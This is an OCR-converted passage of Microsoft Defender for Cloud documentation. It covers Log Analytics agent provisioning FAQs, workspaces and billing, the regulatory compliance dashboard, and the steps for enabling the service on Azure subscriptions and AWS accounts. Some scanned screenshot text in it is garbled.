The agent also enables data collection for Adaptive application controls, Defender for 
Cloud configures a local AppLocker policy in Audit mode to allow all applications. This 
policy causes AppLocker to generate events, which are then collected and used by 
Defender for Cloud. It's important to note that this policy isn't configured on any 
machines on which there's already a configured AppLocker policy. 


When Defender for Cloud detects suspicious activity on the VM, the customer receives 
an email notification if security contact information has been provided. An alert is also 
visible in Defender for Cloud's security alerts dashboard. 


Agents 


What is the Log Analytics agent? 


To monitor for security vulnerabilities and threats, Microsoft Defender for Cloud 
depends on the Log Analytics Agent - this agent is the same used by the Azure Monitor 


service. 
The agent is sometimes referred to as the Azure Monitor Agent (or AMAT 


The agent collects various security-related configuration details and event logs from 
connected machines, and then copies the data to your Log Analytics workspace for 
further analysis. Examples of such data are: operating system type and version, 
operating system logs (Windows event logs), running processes, machine name, IP 
addresses, and logged in user. 


Ensure your machines are running one of the supported operating systems for the agent 
as described on the following pages: 


e Log Analytics agent for Windows supported operating systems 
e Log Analytics agent for Linux supported operating systems 


Learn more about the data collected by the Log Analytics agent. 


What qualifies a VM for automatic provisioning 
of the Log Analytics agent installation? 


Windows or Linux laaS VMs qualify if: 


e The Log Analytics agent extension isn't currently installed on the VM. 

e The VM is in running state. 

e The Windows or Linux Azure Virtual Machine Agent is installed. 

e The VM isn't used as an appliance such as web application firewall or next 
generation firewall. 


What security events does Log Analytics agent 
collect? 


For a full list of the security events collected by the agent, see What event types are 
stored for the "Common" and "Minimal" security events settings?. 


@ Important 


For some services, such as Azure Firewall, logging for a resource that produces 
numerous logs can consume storage in your Log Analytics workspace. Make sure 


you use verbose logging only when necessary. 


What if the Log Analytics agent was already 
installed as an extension on the VM? 


When the Monitoring Agent is installed as an extension, the extension configuration 
allows reporting to only a single workspace. Defender for Cloud doesn't override 
existing connections to user workspaces. Defender for Cloud stores security data from a 
VM in a workspace that is already connected when the "Security" or 
"SecurityCenterFree” solution is installed on it. Defender for Cloud may upgrade the 
extension version to the latest version in this process. 


For more information, see Automatic provisioning in cases of a pre-existing agent 
installation. 


What if a Log Analytics agent is directly installed 
on the machine but not as an extension (Direct 
Agent)? 

If the Log Analytics agent is installed directly on the VM (not as an Azure extension), 


Defender for Cloud installs the Log Analytics agent extension, and may upgrade the Log 
Analytics agent to the latest version. 


The agent installed continues to report to its already configured workspaces, and 
reports to the workspace configured in Defender for Cloud. (Multi-homing is supported 
on Windows machines.) 


For custom user workspaces, you need to install the "Security" or "SecurityCenterFree" 
solution on it so that Defender for Cloud can process events from VMs and computers 


reporting to that workspace. 


For Linux machines, agent multi-homing isn't yet supported. If an existing agent 
installation is detected, Defender for Cloud doesn't automatically uses an agent or 
change the machine's configuration. 


For existing machines on subscriptions onboarded to Defender for Cloud before March 
17 2019, agent multi-homing isn't yet supported. If an existing agent installation is 
detected, Defender for Cloud doesn't automatically use an agent or change the 
machine's configuration. For these machines, see the "Resolve monitoring agent health 
issues on your machines" recommendation to resolve the agent installation issues on 
these machines 


For more information, see the next section What happens if a System Center Operations 
Manager or OMS direct agent is already installed on my VM? 


What if a System Center Operations Manager 
agent is already installed on my VM? 


Defender for Cloud implements an Azure Policy that doesn't allow the Log Analytics 
agent to be installed while the System Center Operations Manager Agent in installed on 
the machine. Both the agents have the ability to multi-home and report to the System 
Center Operations Manager and the Log Analytics workspace. The Operations Manager 
agent and Log Analytics agent share common run-time libraries. Note - If version 2012 
of the Operations Manager agent is installed, don't turn on automatic provisioning 
(manageability capabilities can be lost when the Operations Manager server is also 
version 2012). 


What is the effect of removing these extensions? 


If you remove the Microsoft Monitoring Extension, Defender for Cloud isn't able to 
collect security data from the VM and some security recommendations and alerts are 
unavailable. Within 24 hours, Defender for Cloud determines that the VM is missing the 


extension and reinstalls the extension. 


How do | stop the automatic agent installation 
and workspace creation? 


Deploying extensions with Defender for Cloud is highly recommended in order to get 
security alerts and recommendations about system updates, OS vulnerabilities, and 


endpoint protection. Turning off extensions limits these alerts and recommendations. 


However, you can disable automatic provisioning for a specific agent or extension: 


To disable automatic provisioning for a specific agent or extension: 


1. From the Azure portal“, open Defender for Cloud and select Environment 
settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


Home 


ip) Settings | Defender plans 


Monitor ing coverage astus 
© peur EZ 
E rera Gurr eerren Sra or ere, 


Cloud Workload Protection (CWP) 


bn EE Sra ) 


‘When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free, 
For more information on Defender for Cloud pricing, visit the pricing page, 


4. Turn off the extension you want to stop being automatically provisioned. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans > 


Settings & monitoring 


x 
ASC DEMO 
When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 
Defenders plans : Servers 
Component Description Defender plans Configuration Status 
Log Analytics agent/Azure Monitor agent Collects security-related configurations and event logs from the machine and stores the data in [Gl 9 Agent Type: Log Analytics o EES 
your Log Analytics workspace for analysis. Learn more Selected workspace: default workspace eee 
Security events: None 
Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines, Learn more E Selected VA tool: Microsoft Defender vulnerability 
management | 
Endpoint protection Enables protection powered by Microsoft Defender for Endpoint, including automatic agent E - Off 
deployment to your servers, and security data integration with Defender for Cloud. Learn more A 
Agentless scanning for machines (preview) Scans your machines for installed software and vulnerabilities without relying on agents or E E Edit configuration (on baz 
impacting machine performance, Learn more 


5. Select Save. 


Should | opt out of the automatic agent 
installation and workspace creation? 


© Note 


Be sure to review sections What are the implications of opting out? and 
recommended steps when opting out if you choose to opt out of automatic 
provisioning. 


You may want to opt out of automatic provisioning if these scenarios apply to you: 


e Automatic agent installation by Defender for Cloud applies to the entire 
subscription. You can't apply automatic installation to a subset of VMs. If there are 
critical VMs that can't be installed with the Log Analytics agent, then you should 
opt out of automatic provisioning. 


e Installation of the Log Analytics agent extension updates the agent's version. This 
applies to a direct agent and a System Center Operations Manager agent (in the 
latter, the Operations Manager and Log Analytics agent share common runtime 
libraries - which is updated in the process). If the installed Operations Manager 
agent is version 2012 and is upgraded, manageability capabilities can be lost when 
the Operations Manager server is also version 2012. Consider opting out of 
automatic provisioning if the installed Operations Manager agent is version 2012. 


e |f you want to avoid creation of multiple workspaces per subscription and you have 
your own custom workspace within the subscription, then you have two options: 


o You can opt out of automatic provisioning. After migration, set the default 
workspace settings as described in How can | use my existing Log Analytics 
workspace? 


o Or, you can allow the migration to complete, the Log Analytics agent to be 
installed on the VMs, and the VMs connected to the created workspace. Then, 
select your own custom workspace by setting the default workspace setting 
with opting in to reconfiguring the already installed agents. For more 


information, see How can | use my existing Log Analytics workspace? 


What are the implications of opting out of 
automatic provisioning? 
When migration is complete, Defender for Cloud can't collect security data from the VM 


and some security recommendations and alerts are unavailable. If you opt out, install 
the Log Analytics agent manually. See recommended steps when opting out. 


What are the recommended steps when opting 
out of automatic provisioning? 


Manually install the Log Analytics agent extension so Defender for Cloud can collect 
security data from your VMs and provide recommendations and alerts. See agent 


installation for Windows VM or agent installation for Linux VM for guidance on 
installation. 


You can connect the agent to any existing custom workspace or Defender for Cloud 
created workspace. If a custom workspace doesn't have the "Security" or 
"SecurityCenterFree" solutions enabled, you need to apply a solution. To apply, select 
the custom workspace and apply a pricing tier via the Environment settings > Defender 
plans page. 


Defender for Cloud enables the correct solution on the workspace based on the selected 


options. 


How do I remove OMS extensions installed by 
Defender for Cloud? 


You can manually remove the Log Analytics agent but it isn't recommended. Removing 
OMS extensions limits Defender for Cloud's recommendations and alerts. 


© Note 


If data collection is enabled, Defender for Cloud will reinstall the agent after you 
remove it. You must disable data collection before manually removing the agent. 
See How do | stop the automatic agent installation and workspace creation? for 
instructions on disabling data collection. 

To manually remove the agent: 
1. In the portal, open Log Analytics. 


2. On the Log Analytics page, select a workspace: 


3. Select the VMs that you don't want to monitor and select Disconnect. 
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© Note 


If a Linux VM already has a nonextension OMS agent, removing the extension 


removes the agent as well and you have to reinstall it. 


Will Defender for Cloud work using an OMS 
gateway? 


Yes. Microsoft Defender for Cloud uses Azure Monitor to collect data from Azure VMs 
and servers, using the Log Analytics agent. To collect the data, each VM and server must 
connect to the Internet using HTTPS. The connection can be direct, using a proxy, or 
through the OMS Gateway. 


Does the Log Analytics agent affect the 
performance of my servers? 


The agent consumes a nominal amount of system resources and should have little effect 
on the performance. For more information on performance effect and the agent and 
extension, see the planning and operations guide. 


Agentless 


Which data is collected from snapshots? 


Agentless scanning collects data similar to the data an agent collects to perform the 
same analysis. Raw data, Plls or sensitive business data isn't collected, and only 


metadata results are sent to Defender for Cloud. 


What are the costs related to agentless 
scanning? 


Agentless scanning is included in Defender Cloud Security Posture Management (CSPM) 
and Defender for Servers P2 plans. No other costs incur to Defender for Cloud when 
enabling it. 


© Note 


AWS charges for retention of disk snapshots. The Defender for Cloud scanning 
process actively tries to minimize the period during which a snapshot is stored in 
your account (typically up to a few minutes). AWS may charge an overhead cost for 
the disk snapshots storage. Check with AWS to see what costs apply to you. 


Workspaces 


Am | billed for Azure Monitor logs on the 
workspaces created by Defender for Cloud? 


There's a 500-MB free data ingestion for each workspace. It's calculated per node, per 

reported workspace, per day, and available for every workspace that has a ‘Security’ or 
‘AntiMalware’ solution installed. You're charged for any data ingested over the 500-MB 
limit. 


Workspaces created by Defender for Cloud, while configured for Azure Monitor logs per 
node billing, don't incur Azure Monitor logs charges. Defender for Cloud billing is 
always based on your Defender for Cloud security policy and the solutions installed on a 
workspace: 


e Enhanced security off - Defender for Cloud enables the "SecurityCenterFree" 
solution on the default workspace. There are no charges when there are no 
Defender plans enabled. 


e All Microsoft Defender for Cloud plans enabled — Defender for Cloud enables the 
"Security" solution on the default workspace. 


For pricing details in your local currency or region, see the pricing page”. 


O Note 


The log analytics pricing tier of workspaces created by Defender for Cloud doesn't 
affect Defender for Cloud billing. 


O Note 


This article was recently updated to use the term Azure Monitor logs instead of Log 
Analytics. Log data is still stored in a Log Analytics workspace and is still collected 
and analyzed by the same Log Analytics service. We are updating the terminology 
to better reflect the role of logs in Azure Monitor. See Azure Monitor terminology 
changes for details. 


Where is the default Log Analytics workspace 
created? 


The location of the default workspace depends on your Azure region: 


e For VMs in the United States and Brazil, the workspace location is the United States 
e For VMs in Canada, the workspace location is Canada 

e For VMs in Europe, the workspace location is Europe 

e For VMs in the UK, the workspace location is the UK 

e For VMs in East Asia and Southeast Asia, the workspace location is Asia 

e For VMs in Korea, the workspace location is Korea 

e For VMs in India, the workspace location is India 

e For VMs in Japan, the workspace location is Japan 

e For VMs in China, the workspace location is China 

e For VMs in Australia, the workspace location is Australia 


Can | delete the default workspaces created by 
Defender for Cloud? 


Deleting the default workspace isn't recommended. Defender for Cloud uses the 
default workspaces to store security data from your VMs. If you delete a workspace, 
Defender for Cloud is unable to collect this data and some security recommendations 
and alerts are unavailable. 


To recover, remove the Log Analytics agent on the VMs connected to the deleted 
workspace. Defender for Cloud reinstalls the agent and creates new default workspaces. 


How can I use my existing Log Analytics 
workspace? 


You can select an existing Log Analytics workspace to store data collected by Defender 
for Cloud. To use your existing Log Analytics workspace: 


e The workspace must be associated with your selected Azure subscription. 
e Ata minimum, you must have read permissions to access the workspace. 
© Note 


To get security alerts from that agent, make sure that the Log Analytics agent and 
the machine on which the agent is running both report to a Log Analytics 
workspace in the same tenant. 

To select an existing Log Analytics workspace: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


4. For the Log Analytics agent, select Edit configuration. 


status 


5. Select Custom workspace and select your existing workspace. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans 


Auto-provisioning configuration 
Settings & monitoring ton analytics agent 
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Agent type 


© Log Analytics Agent (Default) 
Collects security-related configurations and event logs from the machine and stores the 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security pol 
y y g en ty ps data in your Log Analytics workspace for analysis 


O Azure Monitor Agent (Preview) 
Collects security-related configurations and event logs from the machine and stores the 
data in your Log Analytics workspace for analysis 


Defenders plans : Servers 
Component Description Workspace selection * ( 


Log Analytics agent/Azure Monitor Collects security-related configurations and event logs from the 


TO Default workspace(s) 
agent machine and stores the data in your Log Analytics workspace for K@) Custom workspacel Select a workspace 
analysis. Learn more 


Ika 


@ When selecting a custom workspace, make sure the relevant solutions are enabled on it. 


Vulnerability assessment for Enables vulnerability assessment on your Azure and hybrid machine Learn more > 
machines Learn more 

Security events storage * © 
Endpoint protection Enables protection powered by Microsoft Defender for Endpoint, 


including automatic agent deployment to your servers, and security 
data integration with Defender for Cloud. Learn more 


Agentless scanning for machines Scans your machines for installed software and vulnerabilities witha 
relying on agents or impacting machine performance. Learn more 


@ [fa VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension 
will still be installed and connected to the configured workspace. 
Any other solutions enabled on the selected workspace will be applied to Azure VMs that are 
connected to it. For paid solutions, this could result in additional charges. 
For data privacy considerations, please make sure your selected workspace is in youp@esired 
region. 


ze 


Q Tip 


The list only includes workspaces to which you have access and which are in 
your Azure subscription. 


6. Select Apply. 


7. Select Continue. 


8. Select Save and confirm that you want to reconfigure monitored VMs. 


@ Important 


This choice is only relevant if you're changing the configuration from the 
default workspace to a custom workspace. If you're changing the setting from 
one custom workspace to another or from a custom workspace to the default 
workspace, the change isn't be applied to existing machines. 


e Select No if you want the new workspace settings to apply on new VMs only. 
The new workspace settings only apply to new agent installations; newly 
discovered VMs that don't have the Log Analytics agent installed. 

e Select Yes if you want the new workspace settings to apply on all VMs. In 
addition, every VM connected to a Defender for Cloud created workspace is 


reconnected to the new target workspace. 


O Note 


If you select Yes, don't delete any workspaces created by Defender for Cloud 
until all VMs have been reconnected to the new target workspace. This 
operation fails if a workspace is deleted too early. 


Does Defender for Cloud override any existing 
connections between VMs and workspaces? 


If a VM already has the Log Analytics agent installed as an Azure extension, Defender for 
Cloud doesn't override the existing workspace connection. Instead, Defender for Cloud 
uses the existing workspace. The VM is protected if the "Security" or 
"SecurityCenterFree" solution has been installed on the workspace to which it's 
reporting. 


A Defender for Cloud solution is installed on the workspace selected in the Data 
Collection screen if not present already, and the solution is applied only to the relevant 
VMs. When you add a solution, it's automatically deployed by default to all Windows 
and Linux agents connected to your Log Analytics workspace. Solution Targeting allows 
you to apply a scope to your solutions. 


Q Tip 


If the Log Analytics agent is installed directly on the VM (not as an Azure 
extension), Defender for Cloud doesn't install the Log Analytics agent, and security 
monitoring is limited. 


Does Defender for Cloud install solutions on my 
existing Log Analytics workspaces? What are the 
billing implications? 

When Defender for Cloud identifies that a VM is already connected to a workspace you 
created, Defender for Cloud enables solutions on this workspace according to your 


pricing configuration. The solutions are applied only to the relevant resources, via 
solution targeting, so the billing remains the same. 


e No Defender plans are enabled — Defender for Cloud installs the 
"SecurityCenterFree" solution on the workspace and you aren't billed for it. 


e Enable all Microsoft Defender plans — Defender for Cloud installs the ‘Security’ 
solution on the workspace. 
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| already have workspaces in my environment, 
can I use them to collect security data? 


If a VM already has the Log Analytics agent installed as an Azure extension, Defender for 
Cloud uses the existing connected workspace. A Defender for Cloud solution is installed 
on the workspace if not present already, and the solution is applied only to the relevant 
VMs via solution targeting. 


When Defender for Cloud installs the Log Analytics agent on VMs, it uses the default 
workspaces created by Defender for Cloud if it's not pointed to an existing workspace. 


| already have security solution on my 
workspaces. What are the billing implications? 


The Security & Audit solution is used to enable Microsoft Defender for Servers. If the 
Security & Audit solution is already installed on a workspace, Defender for Cloud uses 
the existing solution. There's no change in billing. 


Next steps 


Learn about how Defender for Cloud collects data 


Common questions about 
regulatory compliance questions 


FAQ 


How do I know which benchmark or 
standard to use? 


Microsoft cloud security benchmark (MCSB) is the canonical set of security 
recommendations and best practices defined by Microsoft, aligned with common 
compliance control frameworks including CIS Control Framework Z, NIST SP 800-53 £ 
and PCI-DSS. MCSB is a comprehensive cloud agnostic set of security principles 
designed to recommend the most up-to-date technical guidelines for Azure along with 
other clouds such as AWS and GCP. We recommend MCSB to customers who want to 
maximize their security posture and align their compliance status with industry 
standards. 


The CIS Benchmark & is authored by an independent entity e Center for Internet 
Security (CIS) —- and contains recommendations on a subset of core Azure services. We 
work with CIS to try to ensure that their recommendations are up to date with the latest 
enhancements in Azure, but they're sometimes delayed and can become outdated. 
Nonetheless, some customers like to use this objective, third-party assessment from CIS 
as their initial and primary security baseline. 


Since we've released the Microsoft cloud security benchmark, many customers have 
chosen to migrate to it as a replacement for CIS benchmarks. 


What standards are supported in the 
compliance dashboard? 


By default, the regulatory compliance dashboard shows you the Microsoft cloud security 
benchmark. The Microsoft cloud security benchmark is the Microsoft-authored 
guidelines for security, and compliance best practices based on common compliance 
frameworks. Learn more in the Microsoft cloud security benchmark introduction. 


To track your compliance with any other standard, you'll need to explicitly add them to 
your dashboard. 


You can add other standards such as Azure CIS 1.3.0, NIST SP 800-53, NIST SP 800-171, 
SWIFT CSP CSCF-v2020, UK Official and UK NHS, HIPAA, Canada Federal PBMM, ISO 
27001, SOC2-TSP, and PCI-DSS 3.2.1. 


AWS: When users onboard, every AWS account has the AWS Foundational Security Best 
Practices assigned. This is the AWS-specific guideline for security and compliance best 
practices based on common compliance frameworks. 


Users that have one Defender bundle enabled can enable other standards. 
Available AWS regulatory standards: 


e CIS 1.2.0 
e PCI DSS 3.2.1 


e AWS Foundational Security Best Practices 
To add regulatory compliance standards on AWS accounts: 
1. Navigate to Environment settings. 
2. Select the relevant account. 
3. Select Standards. 
4. Select Add and choose Standard. 
5. Choose a standard from the drop-down menu. 


6. Select Save. 


e > Microsoft Defender for Cloud > Settings Add Standard 
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More standards will be added to the dashboard and included in the information on 
Customize the set of standards in your regulatory compliance dashboard. 


Why do some controls appear grayed 
out? 


For each compliance standard in the dashboard, there's a list of the standard's controls. 
For the applicable controls, you can view the details of passing and failing assessments. 


Some controls are grayed out. These controls don't have any Defender for Cloud 
assessments associated with them. Some may be procedure or process-related, and so 
can't be verified by Defender for Cloud. Some don't have any automated policies or 
assessments implemented yet, but will have in the future. And some controls may be the 
platform's responsibility as explained in Shared responsibility in the cloud. 


How can I remove a built-in standard, 


like PCI-DSS, ISO 27001, or SOC2 TSP 
from the dashboard? 


To customize the regulatory compliance dashboard, and focus only on the standards 
that are applicable to you, you can remove any of the displayed regulatory standards 
that aren't relevant to your organization. To remove a standard, follow the instructions in 


Remove a standard from your dashboard. 


| made the suggested changes based on 
the recommendation, but it isn't being 
reflected in the dashboard? 


After you take action to resolve recommendations, wait 12 hours to see the changes to 
your compliance data. Assessments are run approximately every 12 hours, so you'll see 
the effect on your compliance data only after the assessments run. 


What permissions do | need to access 
the compliance dashboard? 


To access all compliance data in your tenant, you need to have at least a Reader level of 
permissions on the applicable scope of your tenant, or all relevant subscriptions. 


The minimum set of roles for accessing the dashboard and managing standards is 
Resource Policy Contributor and Security Admin. 


The regulatory compliance dashboard 
isn't loading for me 


To use the regulatory compliance dashboard, Defender for Cloud must be enabled at 
the subscription level. If the dashboard isn't loading correctly, try the following steps: 


1. Clear your browser's cache. 
2. Try a different browser. 
3. Try opening the dashboard from a different network location. 


How can | view a report of passing and 


failing controls per standard in my 
dashboard? 


On the main dashboard, you can see a report of passing and failing controls for (1) the 
‘top 4' lowest compliance standards in the dashboard. To see all the passing/failing 
controls status, select (2) Show all x (where x is the number of standards you're 
tracking). A context plane displays the compliance status for every one of your tracked 
standards. 
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How can I download a report with 
compliance data in a format other than 
PDF? 


When you select Download report, select the standard and the format (PDF or CSV). 
The resulting report will reflect the current set of subscriptions you've selected in the 
portal's filter. 


e The PDF report shows a summary status for the standard you selected 
e The CSV report provides detailed results per resource, as it relates to policies 
associated with each control 


Currently, there's no support for downloading a report for a custom policy; only for the 
supplied regulatory standards. 


How can I create exceptions for some of 
the policies in the regulatory 
compliance dashboard? 


For policies are built into Defender for Cloud and included in the secure score, you can 
create exemptions for one or more resources directly in the portal as explained in 


Exempting resources and recommendations from your secure score. 


For other policies, you can create an exemption directly in the policy itself, by following 
the instructions in Azure Policy exemption structure. 


What Microsoft Defender plans or 
licenses do | need to use the regulatory 
compliance dashboard? 


If you've got any of the Microsoft Defender plans (except for Defender for Servers Plan 
1) enabled on any of your Azure resources, you can access Defender for Cloud's 
regulatory compliance dashboard and all of its data. 


© Note 


For Defender for Servers you'll get regulatory compliance only for plan 2. Plan 1 
doesn't include regulatory compliance. 


Connect your Azure subscriptions 
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In this guide, you'll learn how to enable Microsoft Defender for Cloud on your Azure 
subscription. 


Microsoft Defender for Cloud is a cloud-native application protection platform (CNAPP) 
with a set of security measures and practices designed to protect your cloud-based 
applications end-to-end by combining the following capabilities: 


e A development security operations (DevSecOps) solution that unifies security 
management at the code level across multicloud and multiple-pipeline 
environments 

e A cloud security posture management (CSPM) solution that surfaces actions that 
you can take to prevent breaches 

e A cloud workload protection platform (CWPP) with specific protections for servers, 
containers, storage, databases, and other workloads 


Defender for Cloud includes Foundational CSPM capabilities for free, complemented by 
additional paid plans required to secure all aspects of your cloud resources. To learn 
more about these plans and their costs, see the Defender for Cloud pricing page”. 


Defender for Cloud helps you find and fix security vulnerabilities. Defender for Cloud 
also applies access and application controls to block malicious activity, detect threats 
using analytics and intelligence, and respond quickly when under attack. 


Prerequisites 


e To view information related to a resource in Defender for Cloud, you must be 
assigned the Owner, Contributor, or Reader role for the subscription or for the 
resource group that the resource is located in. 


Enable Defender for Cloud on your Azure 
subscription 


Q Tip 


To enable Defender for Cloud on all subscriptions within a management group, see 
Enable Defender for Cloud on multiple Azure subscriptions. 


1. Sign in to the Azure portal £. 


2. Search for and select Microsoft Defender for Cloud. 


Microsoft Azure 


Microsoft Defender for Cloud 


@contoso.com @ 


All Services (46) Marketplace (2) 


Azure services 


dk 


Azure Active Directory (0) 


Documentation (99+) 


contoso TZ 


Resources (0) Resource Groups (0) 


See al 
{services 
9 Microsoft Sentinel 
ei Form recognizers 
EA Power Platform 
& Customer Lockbox for Microsoft Azure 
DO Microsoft Defender for Cloud solution for Sentinel 
See al 


Connect apps to get visibility and control - Microsoft Defender for... 
Introduction to Microsoft Defender for Cloud - Training 
Microsoft Defender for Cloud interoperability with Azure services, .. 


Enable Microsoft Defender for Cloud's integrated workload protec... 


Services 
Create a 
resource 
E Azure Database for MySQL servers 
Resources E Microsoft Defender for IoT 
3 E Microsoft Defender EASM 
Recent Favorite 
Marketplace 
Name 
DO Microsoft Defender for Cloud Apps solution for Sentinel 
Documentation 
Defender for Cloud's integrated vulnerability assessment solution ... 
What is Microsoft Defender for Cloud? - Microsoft Defender for Cl... 
Find software and vulnerabilities with agentless scanning - Micros... 
Release notes for Microsoft Defender for Cloud 
Navigate continue searching in Azure Active Directory 


Searching all subscriptions. 


? Subscriptions 5 


Resource groups 


Tools 


g Microsoft Learn 
Learn Azure with free online 


training from Microsoft 


Azure Monitor 


Monitor your apps and 
infrastructure 


Useful links 


Technical Documentation d 
Azure Migration Tools 


Azure Services ZI 
Find an Azure expert 


All resources 


0 Microsoft Defender for Cloud 


Secure your apps and 
infrastructure 


Recent Azure Updates c? 
Quickstart Center 


The Defender for Cloud's overview page opens. 
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Defender Cloud Security Posture Management (CSPM) provides 
enhanced posture capabilities and a new inteligent cloud security 
graph to help identity, prioritize, and reduce risk Defender CSPM 
is available in addition to the free foundational security posture 
capabilities turned on by defaut in Defender for Cloud, 


Cik hereto upgrade > 


Defender EASM 


SG Protect your organization with ataza of your internet 
security posture, Microsoft Defender EASM discovers assets 
across all your first- and third-party prae 


Infrastructure, identifying potential wlnersbil 
Fics for remediation, r 


Explore assets in Defender EASM > 


ba 


Defender for Cloud is now enabled on your subscription and you have access to the 


basic features provided by Defender for Cloud. These features include: 


e The Foundational Cloud Security Posture Management (CSPM) plan. 


e Recommendations. 

e Access to the Asset inventory. 

e Workbooks. 

e Secure score. 

e Regulatory compliance with the Microsoft cloud security benchmark. 


The Defender for Cloud overview page provides a unified view into the security posture 
of your hybrid cloud workloads, helping you discover and assess the security of your 
workloads and to identify and mitigate risks. Learn more in Microsoft Defender for 
Cloud's overview page. 


You can view and filter your list of subscriptions from the subscriptions menu to have 
Defender for Cloud adjust the overview page display to reflect the security posture to 
the selected subscriptions. 


Within minutes of launching Defender for Cloud for the first time, you might see: 


e Recommendations for ways to improve the security of your connected resources. 
e An inventory of your resources that Defender for Cloud assesses along with the 
security posture of each. 


Enable all paid plans on your subscription 


To enable all of Defender for Cloud's protections, you need to enable the plans for the 
workloads that you want to protect. 


© Note 


e You can enable Microsoft Defender for Storage accounts at either the 
subscription level or resource level. 

e You can enable Microsoft Defender for SQL at either the subscription level or 
resource level. 

e You can enable Microsoft Defender for open-source relational databases at 
the resource level only. 

e The Microsoft Defender plans available at the workspace level are: Microsoft 


Defender for Servers, Microsoft Defender for SQL servers on machines. 


When you enable Defender plans on an entire Azure subscription, the protections are 
applied to all other resources in the subscription. 


To enable additional paid plans on a subscription: 


1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 


General 
Defer 

Ọ Overview Click 
@ Getting started ? 93 
= Recommendations Azure subs 
Ọ Security alerts 
Inventory = 32a 

Active reca 
E Cloud Security Explorer (Preview) 
E Workbooks 
& Community 9 
Æ Diagnose and solve problems 
Cloud Security 2, 15 
D Security posture Unassig 
D Regulatory compliance = 
Q workload protections ZE 
E, Firewall Manager 
E DevOps Security (Preview) 
Management : 
E Security solutions 
ZA Workflow automation Explore 


4. Select the subscription or workspace that you want to protect. 


5. Select Enable all to enable all of the plans for Defender for Cloud. 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. Select Save. 


All of the plans are turned on and the monitoring components required by each plan 
are deployed to the protected resources. 


If you want to disable any of the plans, toggle the individual plan to off. The extensions 
used by the plan aren't uninstalled but, after a short time, the extensions stop collecting 
data. 


Q Tip 


To enable Defender for Cloud on all subscriptions within a management group, see 
Enable Defender for Cloud on multiple Azure subscriptions. 


Next steps 


In this guide, you enabled Defender for Cloud on your Azure subscription. The next step 
is to set up your hybrid and multicloud environments. 


Quickstart: Connect your non-Azure machines to Microsoft Defender for Cloud 
with Azure Arc 


Quickstart: Connect your AWS accounts to Microsoft Defender for Cloud 


Quickstart: Connect your GCP projects to Microsoft Defender for Cloud 


Quickstart: Connect your non-Azure machines to Microsoft Defender for Cloud 
with Defender for Endpoint 


Connect your AWS account to Microsoft 
Defender for Cloud 
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Workloads commonly span multiple cloud platforms. Cloud security services must do 
the same. Microsoft Defender for Cloud helps protect workloads in Amazon Web 
Services (AWS), but you need to set up the connection between them and Defender for 
Cloud. 


If you're connecting an AWS account that you previously connected by using the classic 
connector, you must remove it first. Using an AWS account that's connected by both the 
classic and native connectors can produce duplicate recommendations. 


The following screenshot shows AWS accounts displayed in the Defender for Cloud 
overview dashboard. 
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You can learn more by watching the New AWS connector in Defender for Cloud video 
from the Defender for Cloud in the Field video series. 


For a reference list of all the recommendations that Defender for Cloud can provide for 
AWS resources, see Security recommendations for AWS resources - a reference guide. 


Prerequisites 


To complete the procedures in this article, you need: 


e A Microsoft Azure subscription. If you don't have an Azure subscription, you can 
sign up for a free one”. 


e Microsoft Defender for Cloud set up on your Azure subscription. 
e Access to an AWS account. 


e Contributor permission for the relevant Azure subscription, and Administrator 
permission on the AWS account. 


© Note 


The AWS connector is not available on the national government clouds (Azure 
Government, Microsoft Azure operated by 21Vianet). 


Defender for Containers 
If you choose the Microsoft Defender for Containers plan, you need: 


e At least one Amazon EKS cluster with permission to access to the EKS Kubernetes 
API server. If you need to create a new EKS cluster, follow the instructions in 
Getting started with Amazon EKS - eksctl £. 

e The resource capacity to create a new Amazon SQS queue, Kinesis Data Firehose 
delivery stream, and Amazon S3 bucket in the cluster's region. 


Defender for SQL 


If you choose the Microsoft Defender for SQL plan, you need: 


e Microsoft Defender for SQL enabled on your subscription. Learn how to protect 
your databases. 

e An active AWS account, with EC2 instances running SQL Server or RDS Custom for 
SQL Server. 

e Azure Arc for servers installed on your EC2 instances or RDS Custom for SQL 


Server. 


We recommend that you use the auto-provisioning process to install Azure Arc on all of 
your existing and future EC2 instances. To enable the Azure Arc auto-provisioning, you 
need Owner permission on the relevant Azure subscription. 


AWS Systems Manager (SSM) manages auto-provisioning by using the SSM Agent. 
Some Amazon Machine Images already have the SSM Agent preinstalled Z . If your EC2 
instances don't have the SSM Agent, install it by using these instructions from Amazon: 
Install SSM Agent for a hybrid and multicloud environment (Windows) £ . 


Ensure that your SSM Agent has the managed policy 
AmazonSSMManagedInstanceCore Z . It enables core functionality for the AWS Systems 
Manager service. 


Enable these other extensions on the Azure Arc-connected machines: 


e Microsoft Defender for Endpoint 

e A vulnerability assessment solution (TVM or Qualys) 

e The Log Analytics agent on Azure Arc-connected machines or the Azure Monitor 
agent 


Make sure the selected Log Analytics workspace has a security solution installed. The 
Log Analytics agent and the Azure Monitor agent are currently configured at the 
subscription level. All of your AWS accounts and Google Cloud Platform (GCP) projects 
under the same subscription inherit the subscription settings for the Log Analytics agent 
and the Azure Monitor agent. 


Learn more about monitoring components for Defender for Cloud. 


Defender for Servers 
If you choose the Microsoft Defender for Servers plan, you need: 


e Microsoft Defender for Servers enabled on your subscription. Learn how to enable 
plans in Enable enhanced security features. 

e An active AWS account, with EC2 instances. 

e Azure Arc for servers installed on your EC2 instances. 


We recommend that you use the auto-provisioning process to install Azure Arc on all of 
your existing and future EC2 instances. To enable the Azure Arc auto-provisioning, you 
need Owner permission on the relevant Azure subscription. 


AWS Systems Manager manages auto-provisioning by using the SSM Agent. Some 
Amazon Machine Images already have the SSM Agent preinstalled £ . If your EC2 
instances don't have the SSM Agent, install it by using either of the following 


instructions from Amazon: 


